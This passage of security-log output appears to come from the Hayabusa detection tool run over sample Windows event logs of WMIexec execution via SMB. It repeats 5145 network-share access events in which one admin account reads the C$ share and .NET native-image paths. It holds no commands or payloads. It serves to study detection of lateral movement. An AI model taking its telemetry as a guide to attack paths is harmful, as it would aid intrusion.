Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad78daf4#\748bf388335b4acc7031af4d134ad037 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb2d030b7# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb2d030b7#\7dbfc45fb55f5cf738956f4c7b2f8639 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb9b5bb58# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb9b5bb58#\789a3b275b1f5369ae5ab066e2461420 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wbc80354b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wbc80354b#\fac59f632a5e8454549a214641d7bf25 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wc1cc6649# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wc1cc6649#\996a8c9071e330fe0cfac06c4d9f2378 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wca5f1176# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wca5f1176#\f8b6726fa5f43478af33a92559c0cef2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wcffedcb4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wcffedcb4#\f6be55d69bb92d49c71a4f9861c21451 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd75d181a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd75d181a#\1a3848fefabdd8a28f5cae97106da369 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd518ee0d# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd518ee0d#\da3f8769af3163f94176c12ad223cb41 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We9f24001# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We9f24001#\6a6b3af569c21f51ab2982968ae2775d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We0722664# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We0722664#\559ec1b9bc74181e3591df47bdb6b7ce : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wed3937f9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wed3937f9#\4af7f054b14a220217737e71e6adff82 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wf493a5fb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wf493a5fb#\1a4e8e027cdf1271603e7eba2cd8fab0 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MIGUIControls : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MIGUIControls\184c548bb9ea9e668823e3bedee4d86a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MMCEx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\MMCEx\85a6f67f65de23064f7deded08a464c5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MMCFxCommon : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MMCFxCommon\52b6052b9447848191f40e69c88f0f8b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MSBuild : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MSBuild\2965d6f0cc081ef81005efec548f72a9 : IP 
Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\mscorlib : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\c90ef9a73ea0044641d31b19023aad61 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\napcrypt : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\napcrypt\2c945f157cd851b9dc43e99e9a89b34d : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\naphlpr : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\naphlpr\0ed1ed0e250773e63d7fe047dde76c81 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\napinit : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\napinit\1264f8bd57934a4941865b3c0512803e : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\napsnap : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\napsnap\5ab2511c5224a660e85286b3f2c2b752 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c968d57# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c968d57#\cc32e4d4e4dfbff56d3ae35134c1f38e : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c9175f8# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c9175f8#\6a2929eeb7b5fa6ff9ef1b0f4ff440f1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1da2af67# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1da2af67#\efd939ad16f7521ac6c0c15afdcb2fa2 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio4b37ff64# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio4b37ff64#\8bb4776b03f3c369fd0c81c51cf468ac : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\92388fbe99436e6ed1f56ee56f10c565 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio49d6fefe# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio49d6fefe#\9bb6d55c49486153c1c1872929def220 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio53a7a42c# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio53a7a42c#\373b26e93f287f3cda45a6282a1de0d3 : IP Address: 
